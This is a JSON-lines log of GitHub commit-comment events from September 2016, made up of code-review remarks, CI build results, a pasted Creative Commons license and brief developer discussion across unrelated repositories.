{"id":"4585952161","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19085785,"position":null,"line":null,"path":null,"commit_id":"5ef98c8da84dcf0195eb3ae9a1bf016d263cbf7e","created_at":"2016-09-19T21:09:49Z","updated_at":"2016-09-19T21:09:49Z","body":"The idea of that instance (`MonadReader LoggerName m`) was to make it possible to write `logDebug \"message\" \"logger name\"`, because `LoggerName ->` is `MonadReader LoggerName`, but if it introduces conflict, I think it's fine to remove it."}},"created_at":"2016-09-19T21:09:49Z"}
{"id":"4585952535","type":"CommitCommentEvent","actor":{"login":"29251226th"},"repo":{"name":"LitGibbonwithHorseyLC/lhar.work"},"payload":{"comment":{"id":19085787,"position":null,"line":null,"path":null,"commit_id":"610023e41716cec23bcc9a8cf5719e6b6a093820","created_at":"2016-09-19T21:09:52Z","updated_at":"2016-09-19T21:09:52Z","body":"Attribution-ShareAlike 4.0 International\r\n\r\n=======================================================================\r\n\r\nCreative Commons Corporation (\"Creative Commons\") is not a law firm and\r\ndoes not provide legal services or legal advice. Distribution of\r\nCreative Commons public licenses does not create a lawyer-client or\r\nother relationship. Creative Commons makes its licenses and related\r\ninformation available on an \"as-is\" basis. Creative Commons gives no\r\nwarranties regarding its licenses, any material licensed under their\r\nterms and conditions, or any related information. Creative Commons\r\ndisclaims all liability for damages resulting from their use to the\r\nfullest extent possible.\r\n\r\nUsing Creative Commons Public Licenses\r\n\r\nCreative Commons public licenses provide a standard set of terms and\r\nconditions that creators and other rights holders may use to share\r\noriginal works of authorship and other material subject to copyright\r\nand certain other rights specified in the public license below. The\r\nfollowing considerations are for informational purposes only, are not\r\nexhaustive, and do not form part of our licenses.\r\n\r\n     Considerations for licensors: Our public licenses are\r\n     intended for use by those authorized to give the public\r\n     permission to use material in ways otherwise restricted by\r\n     copyright and certain other rights. Our licenses are\r\n     irrevocable. Licensors should read and understand the terms\r\n     and conditions of the license they choose before applying it.\r\n     Licensors should also secure all rights necessary before\r\n     applying our licenses so that the public can reuse the\r\n     material as expected. Licensors should clearly mark any\r\n     material not subject to the license. This includes other CC-\r\n     licensed material, or material used under an exception or\r\n     limitation to copyright. More considerations for licensors:\r\n\twiki.creativecommons.org/Considerations_for_licensors\r\n\r\n     Considerations for the public: By using one of our public\r\n     licenses, a licensor grants the public permission to use the\r\n     licensed material under specified terms and conditions. If\r\n     the licensor's permission is not necessary for any reason--for\r\n     example, because of any applicable exception or limitation to\r\n     copyright--then that use is not regulated by the license. Our\r\n     licenses grant only permissions under copyright and certain\r\n     other rights that a licensor has authority to grant. Use of\r\n     the licensed material may still be restricted for other\r\n     reasons, including because others have copyright or other\r\n     rights in the material. A licensor may make special requests,\r\n     such as asking that all changes be marked or described.\r\n     Although not required by our licenses, you are encouraged to\r\n     respect those requests where reasonable. More_considerations\r\n     for the public: \r\n\twiki.creativecommons.org/Considerations_for_licensees\r\n\r\n=======================================================================\r\n\r\nCreative Commons Attribution-ShareAlike 4.0 International Public\r\nLicense\r\n\r\nBy exercising the Licensed Rights (defined below), You accept and agree\r\nto be bound by the terms and conditions of this Creative Commons\r\nAttribution-ShareAlike 4.0 International Public License (\"Public\r\nLicense\"). To the extent this Public License may be interpreted as a\r\ncontract, You are granted the Licensed Rights in consideration of Your\r\nacceptance of these terms and conditions, and the Licensor grants You\r\nsuch rights in consideration of benefits the Licensor receives from\r\nmaking the Licensed Material available under these terms and\r\nconditions.\r\n\r\n\r\nSection 1 -- Definitions.\r\n\r\n  a. Adapted Material means material subject to Copyright and Similar\r\n     Rights that is derived from or based upon the Licensed Material\r\n     and in which the Licensed Material is translated, altered,\r\n     arranged, transformed, or otherwise modified in a manner requiring\r\n     permission under the Copyright and Similar Rights held by the\r\n     Licensor. For purposes of this Public License, where the Licensed\r\n     Material is a musical work, performance, or sound recording,\r\n     Adapted Material is always produced where the Licensed Material is\r\n     synched in timed relation with a moving image.\r\n\r\n  b. Adapter's License means the license You apply to Your Copyright\r\n     and Similar Rights in Your contributions to Adapted Material in\r\n     accordance with the terms and conditions of this Public License.\r\n\r\n  c. BY-SA Compatible License means a license listed at\r\n     creativecommons.org/compatiblelicenses, approved by Creative\r\n     Commons as essentially the equivalent of this Public License.\r\n\r\n  d. Copyright and Similar Rights means copyright and/or similar rights\r\n     closely related to copyright including, without limitation,\r\n     performance, broadcast, sound recording, and Sui Generis Database\r\n     Rights, without regard to how the rights are labeled or\r\n     categorized. For purposes of this Public License, the rights\r\n     specified in Section 2(b)(1)-(2) are not Copyright and Similar\r\n     Rights.\r\n\r\n  e. Effective Technological Measures means those measures that, in the\r\n     absence of proper authority, may not be circumvented under laws\r\n     fulfilling obligations under Article 11 of the WIPO Copyright\r\n     Treaty adopted on December 20, 1996, and/or similar international\r\n     agreements.\r\n\r\n  f. Exceptions and Limitations means fair use, fair dealing, and/or\r\n     any other exception or limitation to Copyright and Similar Rights\r\n     that applies to Your use of the Licensed Material.\r\n\r\n  g. License Elements means the license attributes listed in the name\r\n     of a Creative Commons Public License. The License Elements of this\r\n     Public License are Attribution and ShareAlike.\r\n\r\n  h. Licensed Material means the artistic or literary work, database,\r\n     or other material to which the Licensor applied this Public\r\n     License.\r\n\r\n  i. Licensed Rights means the rights granted to You subject to the\r\n     terms and conditions of this Public License, which are limited to\r\n     all Copyright and Similar Rights that apply to Your use of the\r\n     Licensed Material and that the Licensor has authority to license.\r\n\r\n  j. Licensor means the individual(s) or entity(ies) granting rights\r\n     under this Public License.\r\n\r\n  k. Share means to provide material to the public by any means or\r\n     process that requires permission under the Licensed Rights, such\r\n     as reproduction, public display, public performance, distribution,\r\n     dissemination, communication, or importation, and to make material\r\n     available to the public including in ways that members of the\r\n     public may access the material from a place and at a time\r\n     individually chosen by them.\r\n\r\n  l. Sui Generis Database Rights means rights other than copyright\r\n     resulting from Directive 96/9/EC of the European Parliament and of\r\n     the Council of 11 March 1996 on the legal protection of databases,\r\n     as amended and/or succeeded, as well as other essentially\r\n     equivalent rights anywhere in the world.\r\n\r\n  m. You means the individual or entity exercising the Licensed Rights\r\n     under this Public License. Your has a corresponding meaning.\r\n\r\n\r\nSection 2 -- Scope.\r\n\r\n  a. License grant.\r\n\r\n       1. Subject to the terms and conditions of this Public License,\r\n          the Licensor hereby grants You a worldwide, royalty-free,\r\n          non-sublicensable, non-exclusive, irrevocable license to\r\n          exercise the Licensed Rights in the Licensed Material to:\r\n\r\n            a. reproduce and Share the Licensed Material, in whole or\r\n               in part; and\r\n\r\n            b. produce, reproduce, and Share Adapted Material.\r\n\r\n       2. Exceptions and Limitations. For the avoidance of doubt, where\r\n          Exceptions and Limitations apply to Your use, this Public\r\n          License does not apply, and You do not need to comply with\r\n          its terms and conditions.\r\n\r\n       3. Term. The term of this Public License is specified in Section\r\n          6(a).\r\n\r\n       4. Media and formats; technical modifications allowed. The\r\n          Licensor authorizes You to exercise the Licensed Rights in\r\n          all media and formats whether now known or hereafter created,\r\n          and to make technical modifications necessary to do so. The\r\n          Licensor waives and/or agrees not to assert any right or\r\n          authority to forbid You from making technical modifications\r\n          necessary to exercise the Licensed Rights, including\r\n          technical modifications necessary to circumvent Effective\r\n          Technological Measures. For purposes of this Public License,\r\n          simply making modifications authorized by this Section 2(a)\r\n          (4) never produces Adapted Material.\r\n\r\n       5. Downstream recipients.\r\n\r\n            a. Offer from the Licensor -- Licensed Material. Every\r\n               recipient of the Licensed Material automatically\r\n               receives an offer from the Licensor to exercise the\r\n               Licensed Rights under the terms and conditions of this\r\n               Public License.\r\n\r\n            b. Additional offer from the Licensor -- Adapted Material.\r\n               Every recipient of Adapted Material from You\r\n               automatically receives an offer from the Licensor to\r\n               exercise the Licensed Rights in the Adapted Material\r\n               under the conditions of the Adapter's License You apply.\r\n\r\n            c. No downstream restrictions. You may not offer or impose\r\n               any additional or different terms or conditions on, or\r\n               apply any Effective Technological Measures to, the\r\n               Licensed Material if doing so restricts exercise of the\r\n               Licensed Rights by any recipient of the Licensed\r\n               Material.\r\n\r\n       6. No endorsement. Nothing in this Public License constitutes or\r\n          may be construed as permission to assert or imply that You\r\n          are, or that Your use of the Licensed Material is, connected\r\n          with, or sponsored, endorsed, or granted official status by,\r\n          the Licensor or others designated to receive attribution as\r\n          provided in Section 3(a)(1)(A)(i).\r\n\r\n  b. Other rights.\r\n\r\n       1. Moral rights, such as the right of integrity, are not\r\n          licensed under this Public License, nor are publicity,\r\n          privacy, and/or other similar personality rights; however, to\r\n          the extent possible, the Licensor waives and/or agrees not to\r\n          assert any such rights held by the Licensor to the limited\r\n          extent necessary to allow You to exercise the Licensed\r\n          Rights, but not otherwise.\r\n\r\n       2. Patent and trademark rights are not licensed under this\r\n          Public License.\r\n\r\n       3. To the extent possible, the Licensor waives any right to\r\n          collect royalties from You for the exercise of the Licensed\r\n          Rights, whether directly or through a collecting society\r\n          under any voluntary or waivable statutory or compulsory\r\n          licensing scheme. In all other cases the Licensor expressly\r\n          reserves any right to collect such royalties.\r\n\r\n\r\nSection 3 -- License Conditions.\r\n\r\nYour exercise of the Licensed Rights is expressly made subject to the\r\nfollowing conditions.\r\n\r\n  a. Attribution.\r\n\r\n       1. If You Share the Licensed Material (including in modified\r\n          form), You must:\r\n\r\n            a. retain the following if it is supplied by the Licensor\r\n               with the Licensed Material:\r\n\r\n                 i. identification of the creator(s) of the Licensed\r\n                    Material and any others designated to receive\r\n                    attribution, in any reasonable manner requested by\r\n                    the Licensor (including by pseudonym if\r\n                    designated);\r\n\r\n                ii. a copyright notice;\r\n\r\n               iii. a notice that refers to this Public License;\r\n\r\n                iv. a notice that refers to the disclaimer of\r\n                    warranties;\r\n\r\n                 v. a URI or hyperlink to the Licensed Material to the\r\n                    extent reasonably practicable;\r\n\r\n            b. indicate if You modified the Licensed Material and\r\n               retain an indication of any previous modifications; and\r\n\r\n            c. indicate the Licensed Material is licensed under this\r\n               Public License, and include the text of, or the URI or\r\n               hyperlink to, this Public License.\r\n\r\n       2. You may satisfy the conditions in Section 3(a)(1) in any\r\n          reasonable manner based on the medium, means, and context in\r\n          which You Share the Licensed Material. For example, it may be\r\n          reasonable to satisfy the conditions by providing a URI or\r\n          hyperlink to a resource that includes the required\r\n          information.\r\n\r\n       3. If requested by the Licensor, You must remove any of the\r\n          information required by Section 3(a)(1)(A) to the extent\r\n          reasonably practicable.\r\n\r\n  b. ShareAlike.\r\n\r\n     In addition to the conditions in Section 3(a), if You Share\r\n     Adapted Material You produce, the following conditions also apply.\r\n\r\n       1. The Adapter's License You apply must be a Creative Commons\r\n          license with the same License Elements, this version or\r\n          later, or a BY-SA Compatible License.\r\n\r\n       2. You must include the text of, or the URI or hyperlink to, the\r\n          Adapter's License You apply. You may satisfy this condition\r\n          in any reasonable manner based on the medium, means, and\r\n          context in which You Share Adapted Material.\r\n\r\n       3. You may not offer or impose any additional or different terms\r\n          or conditions on, or apply any Effective Technological\r\n          Measures to, Adapted Material that restrict exercise of the\r\n          rights granted under the Adapter's License You apply.\r\n\r\n\r\nSection 4 -- Sui Generis Database Rights.\r\n\r\nWhere the Licensed Rights include Sui Generis Database Rights that\r\napply to Your use of the Licensed Material:\r\n\r\n  a. for the avoidance of doubt, Section 2(a)(1) grants You the right\r\n     to extract, reuse, reproduce, and Share all or a substantial\r\n     portion of the contents of the database;\r\n\r\n  b. if You include all or a substantial portion of the database\r\n     contents in a database in which You have Sui Generis Database\r\n     Rights, then the database in which You have Sui Generis Database\r\n     Rights (but not its individual contents) is Adapted Material,\r\n\r\n     including for purposes of Section 3(b); and\r\n  c. You must comply with the conditions in Section 3(a) if You Share\r\n     all or a substantial portion of the contents of the database.\r\n\r\nFor the avoidance of doubt, this Section 4 supplements and does not\r\nreplace Your obligations under this Public License where the Licensed\r\nRights include other Copyright and Similar Rights.\r\n\r\n\r\nSection 5 -- Disclaimer of Warranties and Limitation of Liability.\r\n\r\n  a. UNLESS OTHERWISE SEPARATELY UNDERTAKEN BY THE LICENSOR, TO THE\r\n     EXTENT POSSIBLE, THE LICENSOR OFFERS THE LICENSED MATERIAL AS-IS\r\n     AND AS-AVAILABLE, AND MAKES NO REPRESENTATIONS OR WARRANTIES OF\r\n     ANY KIND CONCERNING THE LICENSED MATERIAL, WHETHER EXPRESS,\r\n     IMPLIED, STATUTORY, OR OTHER. THIS INCLUDES, WITHOUT LIMITATION,\r\n     WARRANTIES OF TITLE, MERCHANTABILITY, FITNESS FOR A PARTICULAR\r\n     PURPOSE, NON-INFRINGEMENT, ABSENCE OF LATENT OR OTHER DEFECTS,\r\n     ACCURACY, OR THE PRESENCE OR ABSENCE OF ERRORS, WHETHER OR NOT\r\n     KNOWN OR DISCOVERABLE. WHERE DISCLAIMERS OF WARRANTIES ARE NOT\r\n     ALLOWED IN FULL OR IN PART, THIS DISCLAIMER MAY NOT APPLY TO YOU.\r\n\r\n  b. TO THE EXTENT POSSIBLE, IN NO EVENT WILL THE LICENSOR BE LIABLE\r\n     TO YOU ON ANY LEGAL THEORY (INCLUDING, WITHOUT LIMITATION,\r\n     NEGLIGENCE) OR OTHERWISE FOR ANY DIRECT, SPECIAL, INDIRECT,\r\n     INCIDENTAL, CONSEQUENTIAL, PUNITIVE, EXEMPLARY, OR OTHER LOSSES,\r\n     COSTS, EXPENSES, OR DAMAGES ARISING OUT OF THIS PUBLIC LICENSE OR\r\n     USE OF THE LICENSED MATERIAL, EVEN IF THE LICENSOR HAS BEEN\r\n     ADVISED OF THE POSSIBILITY OF SUCH LOSSES, COSTS, EXPENSES, OR\r\n     DAMAGES. WHERE A LIMITATION OF LIABILITY IS NOT ALLOWED IN FULL OR\r\n     IN PART, THIS LIMITATION MAY NOT APPLY TO YOU.\r\n\r\n  c. The disclaimer of warranties and limitation of liability provided\r\n     above shall be interpreted in a manner that, to the extent\r\n     possible, most closely approximates an absolute disclaimer and\r\n     waiver of all liability.\r\n\r\n\r\nSection 6 -- Term and Termination.\r\n\r\n  a. This Public License applies for the term of the Copyright and\r\n     Similar Rights licensed here. However, if You fail to comply with\r\n     this Public License, then Your rights under this Public License\r\n     terminate automatically.\r\n\r\n  b. Where Your right to use the Licensed Material has terminated under\r\n     Section 6(a), it reinstates:\r\n\r\n       1. automatically as of the date the violation is cured, provided\r\n          it is cured within 30 days of Your discovery of the\r\n          violation; or\r\n\r\n       2. upon express reinstatement by the Licensor.\r\n\r\n     For the avoidance of doubt, this Section 6(b) does not affect any\r\n     right the Licensor may have to seek remedies for Your violations\r\n     of this Public License.\r\n\r\n  c. For the avoidance of doubt, the Licensor may also offer the\r\n     Licensed Material under separate terms or conditions or stop\r\n     distributing the Licensed Material at any time; however, doing so\r\n     will not terminate this Public License.\r\n\r\n  d. Sections 1, 5, 6, 7, and 8 survive termination of this Public\r\n     License.\r\n\r\n\r\nSection 7 -- Other Terms and Conditions.\r\n\r\n  a. The Licensor shall not be bound by any additional or different\r\n     terms or conditions communicated by You unless expressly agreed.\r\n\r\n  b. Any arrangements, understandings, or agreements regarding the\r\n     Licensed Material not stated herein are separate from and\r\n     independent of the terms and conditions of this Public License.\r\n\r\n\r\nSection 8 -- Interpretation.\r\n\r\n  a. For the avoidance of doubt, this Public License does not, and\r\n     shall not be interpreted to, reduce, limit, restrict, or impose\r\n     conditions on any use of the Licensed Material that could lawfully\r\n     be made without permission under this Public License.\r\n\r\n  b. To the extent possible, if any provision of this Public License is\r\n     deemed unenforceable, it shall be automatically reformed to the\r\n     minimum extent necessary to make it enforceable. If the provision\r\n     cannot be reformed, it shall be severed from this Public License\r\n     without affecting the enforceability of the remaining terms and\r\n     conditions.\r\n\r\n  c. No term or condition of this Public License will be waived and no\r\n     failure to comply consented to unless expressly agreed to by the\r\n     Licensor.\r\n\r\n  d. Nothing in this Public License constitutes or may be interpreted\r\n     as a limitation upon, or waiver of, any privileges and immunities\r\n     that apply to the Licensor or You, including from the legal\r\n     processes of any jurisdiction or authority.\r\n\r\n\r\n=======================================================================\r\n\r\nCreative Commons is not a party to its public\r\nlicenses. Notwithstanding, Creative Commons may elect to apply one of\r\nits public licenses to material it publishes and in those instances\r\nwill be considered the “Licensor.” The text of the Creative Commons\r\npublic licenses is dedicated to the public domain under the CC0 Public\r\nDomain Dedication. Except for the limited purpose of indicating that\r\nmaterial is shared under a Creative Commons public license or as\r\notherwise permitted by the Creative Commons policies published at\r\ncreativecommons.org/policies, Creative Commons does not authorize the\r\nuse of the trademark \"Creative Commons\" or any other trademark or logo\r\nof Creative Commons without its prior written consent including,\r\nwithout limitation, in connection with any unauthorized modifications\r\nto any of its public licenses or any other arrangements,\r\nunderstandings, or agreements concerning use of licensed material. For\r\nthe avoidance of doubt, this paragraph does not form part of the\r\npublic licenses.\r\n\r\nCreative Commons may be contacted at creativecommons.org."}},"created_at":"2016-09-19T21:09:52Z"}
{"id":"4585954924","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19085795,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T21:10:18Z","updated_at":"2016-09-19T21:10:18Z","body":"I didn't know that it's so young. It so convenient!"}},"created_at":"2016-09-19T21:10:18Z"}
{"id":"4585955108","type":"CommitCommentEvent","actor":{"login":"iRoopert"},"repo":{"name":"iRoopert/Roopert"},"payload":{"comment":{"id":19085797,"position":105,"line":105,"path":"index.html","commit_id":"c16d7736be2793ab142f72762d321f3b7630f9cb","created_at":"2016-09-19T21:10:20Z","updated_at":"2016-09-19T21:10:20Z","body":"123"}},"created_at":"2016-09-19T21:10:20Z"}
{"id":"4585958879","type":"CommitCommentEvent","actor":{"login":"magnumripper"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19085812,"position":null,"line":null,"path":null,"commit_id":"47d00bcede8acca40a2243157f4dfdb35c6ab8de","created_at":"2016-09-19T21:11:03Z","updated_at":"2016-09-19T21:11:03Z","body":"A beacon is a broadcast at lower levels. At 801.11 level, they looked identical to me (except the different subtype). Perhaps they can and will contain different information at times, but since the structure is the same and we \"walk the tags\", it all seems to work fine."}},"created_at":"2016-09-19T21:11:03Z"}
{"id":"4585960231","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19085816,"position":null,"line":null,"path":null,"commit_id":"4be510a44cccc664e544342c178947b5a657c89d","created_at":"2016-09-19T21:11:19Z","updated_at":"2016-09-19T21:11:19Z","body":"TeamCity libpalaso :: palaso-precise64-master Continuous [Build 3.0.767.4be510a44cccc664e544342c178947b5a657c89d](http://build.palaso.org/viewLog.html?buildId=76923&buildTypeId=bt322) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:08:08"}},"created_at":"2016-09-19T21:11:19Z"}
{"id":"4585961202","type":"CommitCommentEvent","actor":{"login":"petermarathas"},"repo":{"name":"umts/pvta-multiplatform"},"payload":{"comment":{"id":19085819,"position":25,"line":49,"path":"www/pages/plan-trip/plan-trip-controller.js","commit_id":"9abaebe37ce4161a0401bdf50a7b0ad6e0262f39","created_at":"2016-09-19T21:11:29Z","updated_at":"2016-09-19T21:11:29Z","body":"still need this line here or else the page will never work (if getting location is successful)"}},"created_at":"2016-09-19T21:11:29Z"}
{"id":"4585965354","type":"CommitCommentEvent","actor":{"login":"brosner"},"repo":{"name":"pinax/pinax-api"},"payload":{"comment":{"id":19085825,"position":null,"line":null,"path":null,"commit_id":"8f2e1ef30a62c19fc91eed48adc38ecfcdbc37d6","created_at":"2016-09-19T21:12:19Z","updated_at":"2016-09-19T21:12:19Z","body":"Good catch. I am going to need to rethink this. To implement this for any object is going to be a difficult task. It may not be worth supporting this for everything. I'll mull it over tonight."}},"created_at":"2016-09-19T21:12:19Z"}
{"id":"4585969932","type":"CommitCommentEvent","actor":{"login":"Roboe"},"repo":{"name":"WeAreFairphone/fprsdb"},"payload":{"comment":{"id":19085834,"position":null,"line":null,"path":null,"commit_id":"b8734161dfbca3ecf5f9598f975dc888845ba8fa","created_at":"2016-09-19T21:13:09Z","updated_at":"2016-09-19T21:13:09Z","body":"> Thank you @Roboe for the great discussion! I've learned a lot again!\r\n\r\nA pleasure! :D"}},"created_at":"2016-09-19T21:13:09Z"}
{"id":"4585978192","type":"CommitCommentEvent","actor":{"login":"richfish"},"repo":{"name":"richfish/sfdata26_work"},"payload":{"comment":{"id":19085855,"position":null,"line":null,"path":null,"commit_id":"dc9df628f7beeedc6cd2e6566b98ccf9aa805bfa","created_at":"2016-09-19T21:14:40Z","updated_at":"2016-09-19T21:14:40Z","body":"Hi Cary, \r\n\r\nNo questions re the work. Thanks for taking time to review! \r\n\r\nRichard"}},"created_at":"2016-09-19T21:14:40Z"}
{"id":"4585979515","type":"CommitCommentEvent","actor":{"login":"s123594"},"repo":{"name":"s123594/modellingProject"},"payload":{"comment":{"id":19085865,"position":36,"line":36,"path":"wholeFunction2d.py","commit_id":"f619d85489d523abe82b709a6d5c7a14d83d70cd","created_at":"2016-09-19T21:14:56Z","updated_at":"2016-09-19T21:14:56Z","body":"I have corrected the return, however I am waiting with the helper variables in this one as I consider creating another function for better performance (as I think is one of your points further down)"}},"created_at":"2016-09-19T21:14:56Z"}
{"id":"4585982281","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"MisterAndry/sbt_dz3"},"payload":{"comment":{"id":19085874,"position":18,"line":18,"path":"StringCompare.java","commit_id":"24ef14b2e91121cb62490753d2c14fbab29abb62","created_at":"2016-09-19T21:15:27Z","updated_at":"2016-09-19T21:15:27Z","body":"Представьте, что у вас 3 строки: \"1\", \"2\", \"111\". Ваша реализация вернёт [1, 111, 2], а должно быть [1, 2, 111]"}},"created_at":"2016-09-19T21:15:27Z"}
{"id":"4585993078","type":"CommitCommentEvent","actor":{"login":"Sirhc95"},"repo":{"name":"CypherOS/platform_manifest"},"payload":{"comment":{"id":19085906,"position":null,"line":null,"path":null,"commit_id":"88d4a640c1b757179e35764ccad2acd09fd54f8f","created_at":"2016-09-19T21:17:26Z","updated_at":"2016-09-19T21:17:26Z","body":"Blahh i was tired"}},"created_at":"2016-09-19T21:17:26Z"}
{"id":"4585993348","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/libpalaso"},"payload":{"comment":{"id":19085908,"position":null,"line":null,"path":null,"commit_id":"4be510a44cccc664e544342c178947b5a657c89d","created_at":"2016-09-19T21:17:29Z","updated_at":"2016-09-19T21:17:29Z","body":"TeamCity libpalaso :: palaso-precise64-libpalaso-2.6 Continuous [Build 2.6.1099.4be510a44cccc664e544342c178947b5a657c89d](http://build.palaso.org/viewLog.html?buildId=76924&buildTypeId=PalasoPrecise64v26Cont) outcome was **SUCCESS**\nSummary: Tests passed: 3470, ignored: 107 Build time: 00:06:06"}},"created_at":"2016-09-19T21:17:29Z"}
{"id":"4586000123","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19085925,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T21:18:42Z","updated_at":"2016-09-19T21:18:42Z","body":"@MichaelWallace30 \r\nIm going to add CommPointer into the ObjectStreamWrapper because I am having issues with ObjectStream deleting after the pack and unpack functions."}},"created_at":"2016-09-19T21:18:42Z"}
{"id":"4586000692","type":"CommitCommentEvent","actor":{"login":"riccardi"},"repo":{"name":"kenzable/codeFriends"},"payload":{"comment":{"id":19085927,"position":null,"line":null,"path":null,"commit_id":"d8581c1b1da808c23aba117f30d5ffc864952592","created_at":"2016-09-19T21:18:48Z","updated_at":"2016-09-19T21:18:48Z","body":"Overall Notes:\r\n\r\n- In some files we have define our state and a factory, in some files we define our state and a controller and in some cases we have our factories in different files altogether. For the sake of consistency and organization, I would recommend separating out our states, controllers, and factories into different files possibly organized by component."}},"created_at":"2016-09-19T21:18:48Z"}
{"id":"4586001788","type":"CommitCommentEvent","actor":{"login":"elazarg"},"repo":{"name":"python/mypy"},"payload":{"comment":{"id":19085930,"position":16,"line":843,"path":"mypy/test/data/check-classes.test","commit_id":"9dd1086e76c4d62011c2ff1479abae30565c6db2","created_at":"2016-09-19T21:19:01Z","updated_at":"2016-09-19T21:19:01Z","body":"This code should not typecheck, regardless of B. The runtime dispatch will go to `__add__`, not `__radd__`, and it does not handle `C`. Perhaps you meant a reversed version?"}},"created_at":"2016-09-19T21:19:01Z"}
{"id":"4586002196","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"MisterAndry/sbt_dz3"},"payload":{"comment":{"id":19085933,"position":18,"line":18,"path":"ReverseLines.java","commit_id":"24ef14b2e91121cb62490753d2c14fbab29abb62","created_at":"2016-09-19T21:19:06Z","updated_at":"2016-09-19T21:19:06Z","body":"Используйте List + ListIterator или Deque + descendingIterator"}},"created_at":"2016-09-19T21:19:06Z"}
{"id":"4586009276","type":"CommitCommentEvent","actor":{"login":"StefanBrand"},"repo":{"name":"WeAreFairphone/fprsmap"},"payload":{"comment":{"id":19085949,"position":null,"line":null,"path":null,"commit_id":"68078838af1f026f4c987e48404f53714dccf1c3","created_at":"2016-09-19T21:20:24Z","updated_at":"2016-09-19T21:20:24Z","body":"When I got the error from the Facebook og object debugger I went to w3c \n([HTML meta tag]http://www.w3schools.com/tags/tag_meta.asp) and they say \nthe following:\n\n >In HTML the <meta> tag has no end tag.\n\n >In XHTML the <meta> tag must be properly closed.\n\nApparently the parser only understands the former.\n\nAm 19.09.2016 um 23:12 schrieb Roberto M.F.:\n> And also, not-closing XML tags are correctly ended with the backslash,\n> but HTML5 now accept them without. So it's probably a parsing issue on\n> their side, because, with or without backslashes, that's valid HTML, ;)\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/WeAreFairphone/fprsmap/commit/68078838af1f026f4c987e48404f53714dccf1c3#commitcomment-19085822>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIiMgbaGwu6isDDo4qh71k22dtpvlSylks5qrvqigaJpZM4KA4FH>.\n>\n"}},"created_at":"2016-09-19T21:20:24Z"}
{"id":"4586010506","type":"CommitCommentEvent","actor":{"login":"Rifisherr"},"repo":{"name":"richfish/sfdata26_work"},"payload":{"comment":{"id":19085954,"position":null,"line":null,"path":null,"commit_id":"dc9df628f7beeedc6cd2e6566b98ccf9aa805bfa","created_at":"2016-09-19T21:20:39Z","updated_at":"2016-09-19T21:20:39Z","body":"And apologies - I totally misspelled \"Cari\" . About to have my daily coffee\nnow.\n\nOn Mon, Sep 19, 2016 at 2:14 PM, Richard Fisher <notifications@github.com>\nwrote:\n\n> Hi Cary,\n>\n> No questions re the work. Thanks for taking time to review!\n>\n> Richard\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/richfish/sfdata26_work/commit/dc9df628f7beeedc6cd2e6566b98ccf9aa805bfa#commitcomment-19085855>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAp2HDVZGhZaeAy2SZhNKSh21iaDlXQZks5qrvtAgaJpZM4J-j9C>\n> .\n>\n\n\n\n-- \nrfisher@alumni.upenn.edu\n(713) 906-5025\n"}},"created_at":"2016-09-19T21:20:39Z"}
{"id":"4586011153","type":"CommitCommentEvent","actor":{"login":"RyanTG"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19085958,"position":null,"line":null,"path":null,"commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-19T21:20:47Z","updated_at":"2016-09-19T21:20:47Z","body":"What about \"IF user is logged in then '/get_a_profile' resolves to '/user/user_id/profile'\"? I don't see why a logged in user should ever see /get_a_profile, even if they go directly to that url."}},"created_at":"2016-09-19T21:20:47Z"}
{"id":"4586013078","type":"CommitCommentEvent","actor":{"login":"ivlis"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19085964,"position":null,"line":null,"path":null,"commit_id":"2c5b9080ad485953ecfea5770102d1b241e991c9","created_at":"2016-09-19T21:21:10Z","updated_at":"2016-09-19T21:21:10Z","body":"The alpine image in the Docker Hub was updated a month ago. The Hub itself reports vulnerabilities in this images. Or I don't understand something?"}},"created_at":"2016-09-19T21:21:10Z"}
{"id":"4586013985","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19085969,"position":null,"line":null,"path":null,"commit_id":"47d00bcede8acca40a2243157f4dfdb35c6ab8de","created_at":"2016-09-19T21:21:20Z","updated_at":"2016-09-19T21:21:20Z","body":"The probe may actually be a 'forced' beacon.  A new device enters the network, and forcefully asks, vs waiting for the beacon.  That would make sense.  And having very similar structure make sense, if it is returning the 'same' type data."}},"created_at":"2016-09-19T21:21:20Z"}
{"id":"4586017129","type":"CommitCommentEvent","actor":{"login":"ivlis"},"repo":{"name":"ivlis/docker-alpine-postgres"},"payload":{"comment":{"id":19085977,"position":null,"line":null,"path":null,"commit_id":"42efefd31ef74eb83c65ee8bff24bbd810fc53e3","created_at":"2016-09-19T21:21:55Z","updated_at":"2016-09-19T21:21:55Z","body":"This is a good point, I'll revert this commit."}},"created_at":"2016-09-19T21:21:55Z"}
